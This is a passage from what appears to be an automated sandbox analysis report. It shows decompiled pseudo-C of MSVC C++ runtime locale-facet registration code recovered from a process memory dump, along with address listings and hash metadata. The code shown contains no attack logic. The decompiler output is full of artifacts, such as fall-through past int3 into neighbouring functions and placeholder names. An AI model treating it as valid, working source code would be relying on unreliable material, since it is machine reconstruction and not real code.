                                                                                                										E00F856E6(_t133 - 0x14, 0);
                                                                                                										_t128 =  *0xfd0b60; // 0x0
                                                                                                										 *(_t133 - 4) =  *(_t133 - 4) & 0x00000000;
                                                                                                										 *(_t133 - 0x10) = _t128;
                                                                                                										_t124 = E00F78A40( *((intOrPtr*)(_t133 + 8)), E00F789D0());
                                                                                                										__eflags = _t124;
                                                                                                										if(_t124 != 0) {
                                                                                                											L19:
                                                                                                											E00F8573E(_t133 - 0x14);
                                                                                                											return E00FB388C(_t124);
                                                                                                										} else {
                                                                                                											__eflags = _t128;
                                                                                                											if(__eflags == 0) {
                                                                                                												_push( *((intOrPtr*)(_t133 + 8)));
                                                                                                												_push(_t133 - 0x10);
                                                                                                												_t74 = E00F91BC4(_t124, _t128, __eflags);
                                                                                                												_pop(_t111);
                                                                                                												__eflags = _t74 - 0xffffffff;
                                                                                                												if(__eflags == 0) {
                                                                                                													E00F78FE0(__eflags);
                                                                                                													asm("int3");
                                                                                                													_push(4);
                                                                                                													E00FB38B2(0xfb7295, _t124, _t128);
                                                                                                													_t129 = _t111;
                                                                                                													 *(_t133 - 0x10) = _t129;
                                                                                                													 *((intOrPtr*)(_t129 + 4)) =  *((intOrPtr*)(_t133 + 0xc));
                                                                                                													_push( *((intOrPtr*)(_t133 + 8)));
                                                                                                													_t41 = _t133 - 4;
                                                                                                													 *_t41 =  *(_t133 - 4) & 0x00000000;
                                                                                                													__eflags =  *_t41;
                                                                                                													 *_t129 = 0xfb9ac0;
                                                                                                													E00F929F5(_t111, _t124, _t129,  *_t41);
                                                                                                													return E00FB388C(_t129);
                                                                                                												} else {
                                                                                                													_t124 =  *(_t133 - 0x10);
                                                                                                													 *(_t133 - 0x10) = _t124;
                                                                                                													 *(_t133 - 4) = 1;
                                                                                                													E00F85472(_t124);
                                                                                                													 *0xfb81fc();
                                                                                                													 *((intOrPtr*)( *((intOrPtr*)( *_t124 + 4))))();
                                                                                                													 *0xfd0b60 = _t124;
                                                                                                													goto L19;
                                                                                                												}
                                                                                                											} else {
                                                                                                												_t124 = _t128;
                                                                                                												goto L19;
                                                                                                											}
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t123 =  *(_t133 - 0x10);
                                                                                                										 *(_t133 - 0x10) = _t123;
                                                                                                										 *(_t133 - 4) = 1;
                                                                                                										E00F85472(_t123);
                                                                                                										 *0xfb81fc();
                                                                                                										 *((intOrPtr*)( *((intOrPtr*)( *_t123 + 4))))();
                                                                                                										 *0xfd0b5c = _t123;
                                                                                                										goto L12;
                                                                                                									}
                                                                                                								} else {
                                                                                                									_t123 = _t127;
                                                                                                									goto L12;
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t122 =  *(_t133 - 0x10);
                                                                                                							 *(_t133 - 0x10) = _t122;
                                                                                                							 *(_t133 - 4) = 1;
                                                                                                							E00F85472(_t122);
                                                                                                							 *0xfb81fc();
                                                                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t122 + 4))))();
                                                                                                							 *0xfd0b54 = _t122;
                                                                                                							goto L5;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t122 = _t126;
                                                                                                						goto L5;
                                                                                                					}
                                                                                                				}
                                                                                                			}













                                                                                                0x00f915af
                                                                                                0x00f915b6
                                                                                                0x00f915c0
                                                                                                0x00f915c5
                                                                                                0x00f915d0
                                                                                                0x00f915d4
                                                                                                0x00f915e0
                                                                                                0x00f915e5
                                                                                                0x00f915e9
                                                                                                0x00f9162e
                                                                                                0x00f91631
                                                                                                0x00f9163d
                                                                                                0x00f915eb
                                                                                                0x00f915ed
                                                                                                0x00f915f3
                                                                                                0x00f915f9
                                                                                                0x00f91601
                                                                                                0x00f91604
                                                                                                0x00f9163e
                                                                                                0x00f91643
                                                                                                0x00f91644
                                                                                                0x00f9164b
                                                                                                0x00f91655
                                                                                                0x00f9165a
                                                                                                0x00f91665
                                                                                                0x00f91669
                                                                                                0x00f9167a
                                                                                                0x00f9167c
                                                                                                0x00f9167e
                                                                                                0x00f916c3
                                                                                                0x00f916c6
                                                                                                0x00f916d2
                                                                                                0x00f91680
                                                                                                0x00f91680
                                                                                                0x00f91682
                                                                                                0x00f91688
                                                                                                0x00f9168e
                                                                                                0x00f91696
                                                                                                0x00f91699
                                                                                                0x00f916d3
                                                                                                0x00f916d8
                                                                                                0x00f916d9
                                                                                                0x00f916e0
                                                                                                0x00f916ea
                                                                                                0x00f916ef
                                                                                                0x00f916fa
                                                                                                0x00f916fe
                                                                                                0x00f9170f
                                                                                                0x00f91711
                                                                                                0x00f91713
                                                                                                0x00f91758
                                                                                                0x00f9175b
                                                                                                0x00f91767
                                                                                                0x00f91715
                                                                                                0x00f91715
                                                                                                0x00f91717
                                                                                                0x00f9171d
                                                                                                0x00f91723
                                                                                                0x00f91724
                                                                                                0x00f9172a
                                                                                                0x00f9172b
                                                                                                0x00f9172e
                                                                                                0x00f91768
                                                                                                0x00f9176d
                                                                                                0x00f9176e
                                                                                                0x00f91775
                                                                                                0x00f9177a
                                                                                                0x00f9177c
                                                                                                0x00f91782
                                                                                                0x00f91785
                                                                                                0x00f91788
                                                                                                0x00f91788
                                                                                                0x00f91788
                                                                                                0x00f9178c
                                                                                                0x00f91792
                                                                                                0x00f9179e
                                                                                                0x00f91730
                                                                                                0x00f91730
                                                                                                0x00f91733
                                                                                                0x00f91737
                                                                                                0x00f9173b
                                                                                                0x00f91748
                                                                                                0x00f91750
                                                                                                0x00f91752
                                                                                                0x00000000
                                                                                                0x00f91752
                                                                                                0x00f91719
                                                                                                0x00f91719
                                                                                                0x00000000
                                                                                                0x00f91719
                                                                                                0x00f91717
                                                                                                0x00f9169b
                                                                                                0x00f9169b
                                                                                                0x00f9169e
                                                                                                0x00f916a2
                                                                                                0x00f916a6
                                                                                                0x00f916b3
                                                                                                0x00f916bb
                                                                                                0x00f916bd
                                                                                                0x00000000
                                                                                                0x00f916bd
                                                                                                0x00f91684
                                                                                                0x00f91684
                                                                                                0x00000000
                                                                                                0x00f91684
                                                                                                0x00f91682
                                                                                                0x00f91606
                                                                                                0x00f91606
                                                                                                0x00f91609
                                                                                                0x00f9160d
                                                                                                0x00f91611
                                                                                                0x00f9161e
                                                                                                0x00f91626
                                                                                                0x00f91628
                                                                                                0x00000000
                                                                                                0x00f91628
                                                                                                0x00f915ef
                                                                                                0x00f915ef
                                                                                                0x00000000
                                                                                                0x00f915ef
                                                                                                0x00f915ed

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00F915B6
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F915C0
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::_Lockit.LIBCPMT ref: 00F78A00
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F78A28
                                                                                                • moneypunct.LIBCPMT ref: 00F915FA
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00F91611
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F91631
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                • String ID:
                                                                                                • API String ID: 419941038-0
                                                                                                • Opcode ID: 07ad96cc7cb932c0f04391bd46e698baa1dcd85626823269243ab1718809d830
                                                                                                • Instruction ID: cb068d06f4e7246f039331d9e17f6acd77ebc1f8ce192847eee0ad71b347d0b2
                                                                                                • Opcode Fuzzy Hash: 07ad96cc7cb932c0f04391bd46e698baa1dcd85626823269243ab1718809d830
                                                                                                • Instruction Fuzzy Hash: 1201C435D0011A9BDF05EB64CD056EE77B1BF84760F68401AE401AB391DF789E06FB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 71%
                                                                                                			E00F87542(void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
                                                                                                				signed int _v4;
                                                                                                				signed int _v16;
                                                                                                				char _v20;
                                                                                                				intOrPtr _v32;
                                                                                                				signed int _t117;
                                                                                                				void* _t210;
                                                                                                				short* _t304;
                                                                                                				void* _t332;
                                                                                                				signed int _t335;
                                                                                                				signed int _t336;
                                                                                                				signed int _t337;
                                                                                                				signed int _t338;
                                                                                                				signed int _t339;
                                                                                                				signed int _t340;
                                                                                                				signed int _t341;
                                                                                                				signed int _t342;
                                                                                                				signed int _t344;
                                                                                                				signed int _t345;
                                                                                                				signed int _t346;
                                                                                                				signed int _t347;
                                                                                                				signed int _t348;
                                                                                                				signed int _t349;
                                                                                                				signed int _t350;
                                                                                                				signed int _t351;
                                                                                                				signed int _t352;
                                                                                                				short* _t353;
                                                                                                
                                                                                                				_push(8);
                                                                                                				E00FB38B2(0xfb6ebe, __edi, __esi);
                                                                                                				E00F856E6( &_v20, 0);
                                                                                                				_t344 =  *0xfd0b10; // 0x0
                                                                                                				_v4 = _v4 & 0x00000000;
                                                                                                				_v16 = _t344;
                                                                                                				_t117 = E00F78A40(_a8, E00F789D0());
                                                                                                				_t334 = _t117;
                                                                                                				if(_t117 != 0) {
                                                                                                					L5:
                                                                                                					E00F8573E( &_v20);
                                                                                                					return E00FB388C(_t334);
                                                                                                				} else {
                                                                                                					if(_t344 == 0) {
                                                                                                						_push(_a8);
                                                                                                						_push( &_v16);
                                                                                                						__eflags = E00F888E0(_t334, _t344, __eflags) - 0xffffffff;
                                                                                                						if(__eflags == 0) {
                                                                                                							E00F78FE0(__eflags);
                                                                                                							asm("int3");
                                                                                                							_push(8);
                                                                                                							E00FB38B2(0xfb6ebe, _t334, _t344);
                                                                                                							E00F856E6( &_v20, 0);
                                                                                                							_t345 =  *0xfd0ae4; // 0x0
                                                                                                							_v4 = _v4 & 0x00000000;
                                                                                                							_v16 = _t345;
                                                                                                							_t335 = E00F78A40(_a8, E00F789D0());
                                                                                                							__eflags = _t335;
                                                                                                							if(_t335 != 0) {
                                                                                                								L12:
                                                                                                								E00F8573E( &_v20);
                                                                                                								return E00FB388C(_t335);
                                                                                                							} else {
                                                                                                								__eflags = _t345;
                                                                                                								if(__eflags == 0) {
                                                                                                									_push(_a8);
                                                                                                									_push( &_v16);
                                                                                                									__eflags = E00F88965(_t335, _t345, __eflags) - 0xffffffff;
                                                                                                									if(__eflags == 0) {
                                                                                                										E00F78FE0(__eflags);
                                                                                                										asm("int3");
                                                                                                										_push(8);
                                                                                                										E00FB38B2(0xfb6ebe, _t335, _t345);
                                                                                                										E00F856E6( &_v20, 0);
                                                                                                										_t346 =  *0xfd0ae0; // 0x0
                                                                                                										_v4 = _v4 & 0x00000000;
                                                                                                										_v16 = _t346;
                                                                                                										_t336 = E00F78A40(_a8, E00F789D0());
                                                                                                										__eflags = _t336;
                                                                                                										if(_t336 != 0) {
                                                                                                											L19:
                                                                                                											E00F8573E( &_v20);
                                                                                                											return E00FB388C(_t336);
                                                                                                										} else {
                                                                                                											__eflags = _t346;
                                                                                                											if(__eflags == 0) {
                                                                                                												_push(_a8);
                                                                                                												_push( &_v16);
                                                                                                												__eflags = E00F889E9(_t336, _t346, __eflags) - 0xffffffff;
                                                                                                												if(__eflags == 0) {
                                                                                                													E00F78FE0(__eflags);
                                                                                                													asm("int3");
                                                                                                													_push(8);
                                                                                                													E00FB38B2(0xfb6ebe, _t336, _t346);
                                                                                                													E00F856E6( &_v20, 0);
                                                                                                													_t347 =  *0xfd0af4; // 0x0
                                                                                                													_v4 = _v4 & 0x00000000;
                                                                                                													_v16 = _t347;
                                                                                                													_t337 = E00F78A40(_a8, E00F789D0());
                                                                                                													__eflags = _t337;
                                                                                                													if(_t337 != 0) {
                                                                                                														L26:
                                                                                                														E00F8573E( &_v20);
                                                                                                														return E00FB388C(_t337);
                                                                                                													} else {
                                                                                                														__eflags = _t347;
                                                                                                														if(__eflags == 0) {
                                                                                                															_push(_a8);
                                                                                                															_push( &_v16);
                                                                                                															__eflags = E00F88A6E(_t337, _t347, __eflags) - 0xffffffff;
                                                                                                															if(__eflags == 0) {
                                                                                                																E00F78FE0(__eflags);
                                                                                                																asm("int3");
                                                                                                																_push(8);
                                                                                                																E00FB38B2(0xfb6ebe, _t337, _t347);
                                                                                                																E00F856E6( &_v20, 0);
                                                                                                																_t348 =  *0xfd0af8; // 0x0
                                                                                                																_v4 = _v4 & 0x00000000;
                                                                                                																_v16 = _t348;
                                                                                                																_t338 = E00F78A40(_a8, E00F789D0());
                                                                                                																__eflags = _t338;
                                                                                                																if(_t338 != 0) {
                                                                                                																	L33:
                                                                                                																	E00F8573E( &_v20);
                                                                                                																	return E00FB388C(_t338);
                                                                                                																} else {
                                                                                                																	__eflags = _t348;
                                                                                                																	if(__eflags == 0) {
                                                                                                																		_push(_a8);
                                                                                                																		_push( &_v16);
                                                                                                																		__eflags = E00F88AD6(_t338, _t348, __eflags) - 0xffffffff;
                                                                                                																		if(__eflags == 0) {
                                                                                                																			E00F78FE0(__eflags);
                                                                                                																			asm("int3");
                                                                                                																			_push(8);
                                                                                                																			E00FB38B2(0xfb6ebe, _t338, _t348);
                                                                                                																			E00F856E6( &_v20, 0);
                                                                                                																			_t349 =  *0xfd0afc; // 0x0
                                                                                                																			_v4 = _v4 & 0x00000000;
                                                                                                																			_v16 = _t349;
                                                                                                																			_t339 = E00F78A40(_a8, E00F789D0());
                                                                                                																			__eflags = _t339;
                                                                                                																			if(_t339 != 0) {
                                                                                                																				L40:
                                                                                                																				E00F8573E( &_v20);
                                                                                                																				return E00FB388C(_t339);
                                                                                                																			} else {
                                                                                                																				__eflags = _t349;
                                                                                                																				if(__eflags == 0) {
                                                                                                																					_push(_a8);
                                                                                                																					_push( &_v16);
                                                                                                																					__eflags = E00F88B3E(_t332, _t339, _t349, __eflags) - 0xffffffff;
                                                                                                																					if(__eflags == 0) {
                                                                                                																						E00F78FE0(__eflags);
                                                                                                																						asm("int3");
                                                                                                																						_push(8);
                                                                                                																						E00FB38B2(0xfb6ebe, _t339, _t349);
                                                                                                																						E00F856E6( &_v20, 0);
                                                                                                																						_t350 =  *0xfd0b18; // 0x0
                                                                                                																						_v4 = _v4 & 0x00000000;
                                                                                                																						_v16 = _t350;
                                                                                                																						_t340 = E00F78A40(_a8, E00F789D0());
                                                                                                																						__eflags = _t340;
                                                                                                																						if(_t340 != 0) {
                                                                                                																							L47:
                                                                                                																							E00F8573E( &_v20);
                                                                                                																							return E00FB388C(_t340);
                                                                                                																						} else {
                                                                                                																							__eflags = _t350;
                                                                                                																							if(__eflags == 0) {
                                                                                                																								_push(_a8);
                                                                                                																								_push( &_v16);
                                                                                                																								__eflags = E00F88BB9(_t340, _t350, __eflags) - 0xffffffff;
                                                                                                																								if(__eflags == 0) {
                                                                                                																									E00F78FE0(__eflags);
                                                                                                																									asm("int3");
                                                                                                																									_push(8);
                                                                                                																									E00FB38B2(0xfb6ebe, _t340, _t350);
                                                                                                																									E00F856E6( &_v20, 0);
                                                                                                																									_t351 =  *0xfd0ae8; // 0x0
                                                                                                																									_v4 = _v4 & 0x00000000;
                                                                                                																									_v16 = _t351;
                                                                                                																									_t341 = E00F78A40(_a8, E00F789D0());
                                                                                                																									__eflags = _t341;
                                                                                                																									if(_t341 != 0) {
                                                                                                																										L54:
                                                                                                																										E00F8573E( &_v20);
                                                                                                																										return E00FB388C(_t341);
                                                                                                																									} else {
                                                                                                																										__eflags = _t351;
                                                                                                																										if(__eflags == 0) {
                                                                                                																											_push(_a8);
                                                                                                																											_push( &_v16);
                                                                                                																											__eflags = E00F88C25(_t341, _t351, __eflags) - 0xffffffff;
                                                                                                																											if(__eflags == 0) {
                                                                                                																												E00F78FE0(__eflags);
                                                                                                																												asm("int3");
                                                                                                																												_push(8);
                                                                                                																												E00FB38B2(0xfb6ebe, _t341, _t351);
                                                                                                																												E00F856E6( &_v20, 0);
                                                                                                																												_t352 =  *0xfd0b1c; // 0x0
                                                                                                																												_v4 = _v4 & 0x00000000;
                                                                                                																												_v16 = _t352;
                                                                                                																												_t342 = E00F78A40(_a8, E00F789D0());
                                                                                                																												__eflags = _t342;
                                                                                                																												if(_t342 != 0) {
                                                                                                																													L61:
                                                                                                																													E00F8573E( &_v20);
                                                                                                																													return E00FB388C(_t342);
                                                                                                																												} else {
                                                                                                																													__eflags = _t352;
                                                                                                																													if(__eflags == 0) {
                                                                                                																														_push(_a8);
                                                                                                																														_push( &_v16);
                                                                                                																														_t210 = E00F88C91(_t342, _t352, __eflags);
                                                                                                																														_pop(_t304);
                                                                                                																														__eflags = _t210 - 0xffffffff;
                                                                                                																														if(__eflags == 0) {
                                                                                                																															E00F78FE0(__eflags);
                                                                                                																															asm("int3");
                                                                                                																															_push(_t352);
                                                                                                																															_t353 = _t304;
                                                                                                																															_t110 = _t353 + 0x10;
                                                                                                																															 *_t110 =  *(_t353 + 0x10) & 0x00000000;
                                                                                                																															__eflags =  *_t110;
                                                                                                																															 *((intOrPtr*)(_t353 + 0x14)) = 7;
                                                                                                																															 *_t353 = 0;
                                                                                                																															E00F8D9F3(_v32);
                                                                                                																															return _t353;
                                                                                                																														} else {
                                                                                                																															_t342 = _v16;
                                                                                                																															_v16 = _t342;
                                                                                                																															_v4 = 1;
                                                                                                																															E00F85472(_t342);
                                                                                                																															 *0xfb81fc();
                                                                                                																															 *((intOrPtr*)( *((intOrPtr*)( *_t342 + 4))))();
                                                                                                																															 *0xfd0b1c = _t342;
                                                                                                																															goto L61;
                                                                                                																														}
                                                                                                																													} else {
                                                                                                																														_t342 = _t352;
                                                                                                																														goto L61;
                                                                                                																													}
                                                                                                																												}
                                                                                                																											} else {
                                                                                                																												_t341 = _v16;
                                                                                                																												_v16 = _t341;
                                                                                                																												_v4 = 1;
                                                                                                																												E00F85472(_t341);
                                                                                                																												 *0xfb81fc();
                                                                                                																												 *((intOrPtr*)( *((intOrPtr*)( *_t341 + 4))))();
                                                                                                																												 *0xfd0ae8 = _t341;
                                                                                                																												goto L54;
                                                                                                																											}
                                                                                                																										} else {
                                                                                                																											_t341 = _t351;
                                                                                                																											goto L54;
                                                                                                																										}
                                                                                                																									}
                                                                                                																								} else {
                                                                                                																									_t340 = _v16;
                                                                                                																									_v16 = _t340;
                                                                                                																									_v4 = 1;
                                                                                                																									E00F85472(_t340);
                                                                                                																									 *0xfb81fc();
                                                                                                																									 *((intOrPtr*)( *((intOrPtr*)( *_t340 + 4))))();
                                                                                                																									 *0xfd0b18 = _t340;
                                                                                                																									goto L47;
                                                                                                																								}
                                                                                                																							} else {
                                                                                                																								_t340 = _t350;
                                                                                                																								goto L47;
                                                                                                																							}
                                                                                                																						}
                                                                                                																					} else {
                                                                                                																						_t339 = _v16;
                                                                                                																						_v16 = _t339;
                                                                                                																						_v4 = 1;
                                                                                                																						E00F85472(_t339);
                                                                                                																						 *0xfb81fc();
                                                                                                																						 *((intOrPtr*)( *((intOrPtr*)( *_t339 + 4))))();
                                                                                                																						 *0xfd0afc = _t339;
                                                                                                																						goto L40;
                                                                                                																					}
                                                                                                																				} else {
                                                                                                																					_t339 = _t349;
                                                                                                																					goto L40;
                                                                                                																				}
                                                                                                																			}
                                                                                                																		} else {
                                                                                                																			_t338 = _v16;
                                                                                                																			_v16 = _t338;
                                                                                                																			_v4 = 1;
                                                                                                																			E00F85472(_t338);
                                                                                                																			 *0xfb81fc();
                                                                                                																			 *((intOrPtr*)( *((intOrPtr*)( *_t338 + 4))))();
                                                                                                																			 *0xfd0af8 = _t338;
                                                                                                																			goto L33;
                                                                                                																		}
                                                                                                																	} else {
                                                                                                																		_t338 = _t348;
                                                                                                																		goto L33;
                                                                                                																	}
                                                                                                																}
                                                                                                															} else {
                                                                                                																_t337 = _v16;
                                                                                                																_v16 = _t337;
                                                                                                																_v4 = 1;
                                                                                                																E00F85472(_t337);
                                                                                                																 *0xfb81fc();
                                                                                                																 *((intOrPtr*)( *((intOrPtr*)( *_t337 + 4))))();
                                                                                                																 *0xfd0af4 = _t337;
                                                                                                																goto L26;
                                                                                                															}
                                                                                                														} else {
                                                                                                															_t337 = _t347;
                                                                                                															goto L26;
                                                                                                														}
                                                                                                													}
                                                                                                												} else {
                                                                                                													_t336 = _v16;
                                                                                                													_v16 = _t336;
                                                                                                													_v4 = 1;
                                                                                                													E00F85472(_t336);
                                                                                                													 *0xfb81fc();
                                                                                                													 *((intOrPtr*)( *((intOrPtr*)( *_t336 + 4))))();
                                                                                                													 *0xfd0ae0 = _t336;
                                                                                                													goto L19;
                                                                                                												}
                                                                                                											} else {
                                                                                                												_t336 = _t346;
                                                                                                												goto L19;
                                                                                                											}
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t335 = _v16;
                                                                                                										_v16 = _t335;
                                                                                                										_v4 = 1;
                                                                                                										E00F85472(_t335);
                                                                                                										 *0xfb81fc();
                                                                                                										 *((intOrPtr*)( *((intOrPtr*)( *_t335 + 4))))();
                                                                                                										 *0xfd0ae4 = _t335;
                                                                                                										goto L12;
                                                                                                									}
                                                                                                								} else {
                                                                                                									_t335 = _t345;
                                                                                                									goto L12;
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t334 = _v16;
                                                                                                							_v16 = _t334;
                                                                                                							_v4 = 1;
                                                                                                							E00F85472(_t334);
                                                                                                							 *0xfb81fc();
                                                                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t334 + 4))))();
                                                                                                							 *0xfd0b10 = _t334;
                                                                                                							goto L5;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t334 = _t344;
                                                                                                						goto L5;
                                                                                                					}
                                                                                                				}
                                                                                                			}





























                                                                                                0x00f87542
                                                                                                0x00f87549
                                                                                                0x00f87553
                                                                                                0x00f87558
                                                                                                0x00f87563
                                                                                                0x00f87567
                                                                                                0x00f87573
                                                                                                0x00f87578
                                                                                                0x00f8757c
                                                                                                0x00f875c1
                                                                                                0x00f875c4
                                                                                                0x00f875d0
                                                                                                0x00f8757e
                                                                                                0x00f87580
                                                                                                0x00f87586
                                                                                                0x00f8758c
                                                                                                0x00f87594
                                                                                                0x00f87597
                                                                                                0x00f875d1
                                                                                                0x00f875d6
                                                                                                0x00f875d7
                                                                                                0x00f875de
                                                                                                0x00f875e8
                                                                                                0x00f875ed
                                                                                                0x00f875f8
                                                                                                0x00f875fc
                                                                                                0x00f8760d
                                                                                                0x00f8760f
                                                                                                0x00f87611
                                                                                                0x00f87656
                                                                                                0x00f87659
                                                                                                0x00f87665
                                                                                                0x00f87613
                                                                                                0x00f87613
                                                                                                0x00f87615
                                                                                                0x00f8761b
                                                                                                0x00f87621
                                                                                                0x00f87629
                                                                                                0x00f8762c
                                                                                                0x00f87666
                                                                                                0x00f8766b
                                                                                                0x00f8766c
                                                                                                0x00f87673
                                                                                                0x00f8767d
                                                                                                0x00f87682
                                                                                                0x00f8768d
                                                                                                0x00f87691
                                                                                                0x00f876a2
                                                                                                0x00f876a4
                                                                                                0x00f876a6
                                                                                                0x00f876eb
                                                                                                0x00f876ee
                                                                                                0x00f876fa
                                                                                                0x00f876a8
                                                                                                0x00f876a8
                                                                                                0x00f876aa
                                                                                                0x00f876b0
                                                                                                0x00f876b6
                                                                                                0x00f876be
                                                                                                0x00f876c1
                                                                                                0x00f876fb
                                                                                                0x00f87700
                                                                                                0x00f87701
                                                                                                0x00f87708
                                                                                                0x00f87712
                                                                                                0x00f87717
                                                                                                0x00f87722
                                                                                                0x00f87726
                                                                                                0x00f87737
                                                                                                0x00f87739
                                                                                                0x00f8773b
                                                                                                0x00f87780
                                                                                                0x00f87783
                                                                                                0x00f8778f
                                                                                                0x00f8773d
                                                                                                0x00f8773d
                                                                                                0x00f8773f
                                                                                                0x00f87745
                                                                                                0x00f8774b
                                                                                                0x00f87753
                                                                                                0x00f87756
                                                                                                0x00f87790
                                                                                                0x00f87795
                                                                                                0x00f87796
                                                                                                0x00f8779d
                                                                                                0x00f877a7
                                                                                                0x00f877ac
                                                                                                0x00f877b7
                                                                                                0x00f877bb
                                                                                                0x00f877cc
                                                                                                0x00f877ce
                                                                                                0x00f877d0
                                                                                                0x00f87815
                                                                                                0x00f87818
                                                                                                0x00f87824
                                                                                                0x00f877d2
                                                                                                0x00f877d2
                                                                                                0x00f877d4
                                                                                                0x00f877da
                                                                                                0x00f877e0
                                                                                                0x00f877e8
                                                                                                0x00f877eb
                                                                                                0x00f87825
                                                                                                0x00f8782a
                                                                                                0x00f8782b
                                                                                                0x00f87832
                                                                                                0x00f8783c
                                                                                                0x00f87841
                                                                                                0x00f8784c
                                                                                                0x00f87850
                                                                                                0x00f87861
                                                                                                0x00f87863
                                                                                                0x00f87865
                                                                                                0x00f878aa
                                                                                                0x00f878ad
                                                                                                0x00f878b9
                                                                                                0x00f87867
                                                                                                0x00f87867
                                                                                                0x00f87869
                                                                                                0x00f8786f
                                                                                                0x00f87875
                                                                                                0x00f8787d
                                                                                                0x00f87880
                                                                                                0x00f878ba
                                                                                                0x00f878bf
                                                                                                0x00f878c0
                                                                                                0x00f878c7
                                                                                                0x00f878d1
                                                                                                0x00f878d6
                                                                                                0x00f878e1
                                                                                                0x00f878e5
                                                                                                0x00f878f6
                                                                                                0x00f878f8
                                                                                                0x00f878fa
                                                                                                0x00f8793f
                                                                                                0x00f87942
                                                                                                0x00f8794e
                                                                                                0x00f878fc
                                                                                                0x00f878fc
                                                                                                0x00f878fe
                                                                                                0x00f87904
                                                                                                0x00f8790a
                                                                                                0x00f87912
                                                                                                0x00f87915
                                                                                                0x00f8794f
                                                                                                0x00f87954
                                                                                                0x00f87955
                                                                                                0x00f8795c
                                                                                                0x00f87966
                                                                                                0x00f8796b
                                                                                                0x00f87976
                                                                                                0x00f8797a
                                                                                                0x00f8798b
                                                                                                0x00f8798d
                                                                                                0x00f8798f
                                                                                                0x00f879d4
                                                                                                0x00f879d7
                                                                                                0x00f879e3
                                                                                                0x00f87991
                                                                                                0x00f87991
                                                                                                0x00f87993
                                                                                                0x00f87999
                                                                                                0x00f8799f
                                                                                                0x00f879a7
                                                                                                0x00f879aa
                                                                                                0x00f879e4
                                                                                                0x00f879e9
                                                                                                0x00f879ea
                                                                                                0x00f879f1
                                                                                                0x00f879fb
                                                                                                0x00f87a00
                                                                                                0x00f87a0b
                                                                                                0x00f87a0f
                                                                                                0x00f87a20
                                                                                                0x00f87a22
                                                                                                0x00f87a24
                                                                                                0x00f87a69
                                                                                                0x00f87a6c
                                                                                                0x00f87a78
                                                                                                0x00f87a26
                                                                                                0x00f87a26
                                                                                                0x00f87a28
                                                                                                0x00f87a2e
                                                                                                0x00f87a34
                                                                                                0x00f87a35
                                                                                                0x00f87a3b
                                                                                                0x00f87a3c
                                                                                                0x00f87a3f
                                                                                                0x00f87a79
                                                                                                0x00f87a7e
                                                                                                0x00f87a82
                                                                                                0x00f87a86
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8e
                                                                                                0x00f87a95
                                                                                                0x00f87a98
                                                                                                0x00f87aa1
                                                                                                0x00f87a41
                                                                                                0x00f87a41
                                                                                                0x00f87a44
                                                                                                0x00f87a48
                                                                                                0x00f87a4c
                                                                                                0x00f87a59
                                                                                                0x00f87a61
                                                                                                0x00f87a63
                                                                                                0x00000000
                                                                                                0x00f87a63
                                                                                                0x00f87a2a
                                                                                                0x00f87a2a
                                                                                                0x00000000
                                                                                                0x00f87a2a
                                                                                                0x00f87a28
                                                                                                0x00f879ac
                                                                                                0x00f879ac
                                                                                                0x00f879af
                                                                                                0x00f879b3
                                                                                                0x00f879b7
                                                                                                0x00f879c4
                                                                                                0x00f879cc
                                                                                                0x00f879ce
                                                                                                0x00000000
                                                                                                0x00f879ce
                                                                                                0x00f87995
                                                                                                0x00f87995
                                                                                                0x00000000
                                                                                                0x00f87995
                                                                                                0x00f87993
                                                                                                0x00f87917
                                                                                                0x00f87917
                                                                                                0x00f8791a
                                                                                                0x00f8791e
                                                                                                0x00f87922
                                                                                                0x00f8792f
                                                                                                0x00f87937
                                                                                                0x00f87939
                                                                                                0x00000000
                                                                                                0x00f87939
                                                                                                0x00f87900
                                                                                                0x00f87900
                                                                                                0x00000000
                                                                                                0x00f87900
                                                                                                0x00f878fe
                                                                                                0x00f87882
                                                                                                0x00f87882
                                                                                                0x00f87885
                                                                                                0x00f87889
                                                                                                0x00f8788d
                                                                                                0x00f8789a
                                                                                                0x00f878a2
                                                                                                0x00f878a4
                                                                                                0x00000000
                                                                                                0x00f878a4
                                                                                                0x00f8786b
                                                                                                0x00f8786b
                                                                                                0x00000000
                                                                                                0x00f8786b
                                                                                                0x00f87869
                                                                                                0x00f877ed
                                                                                                0x00f877ed
                                                                                                0x00f877f0
                                                                                                0x00f877f4
                                                                                                0x00f877f8
                                                                                                0x00f87805
                                                                                                0x00f8780d
                                                                                                0x00f8780f
                                                                                                0x00000000
                                                                                                0x00f8780f
                                                                                                0x00f877d6
                                                                                                0x00f877d6
                                                                                                0x00000000
                                                                                                0x00f877d6
                                                                                                0x00f877d4
                                                                                                0x00f87758
                                                                                                0x00f87758
                                                                                                0x00f8775b
                                                                                                0x00f8775f
                                                                                                0x00f87763
                                                                                                0x00f87770
                                                                                                0x00f87778
                                                                                                0x00f8777a
                                                                                                0x00000000
                                                                                                0x00f8777a
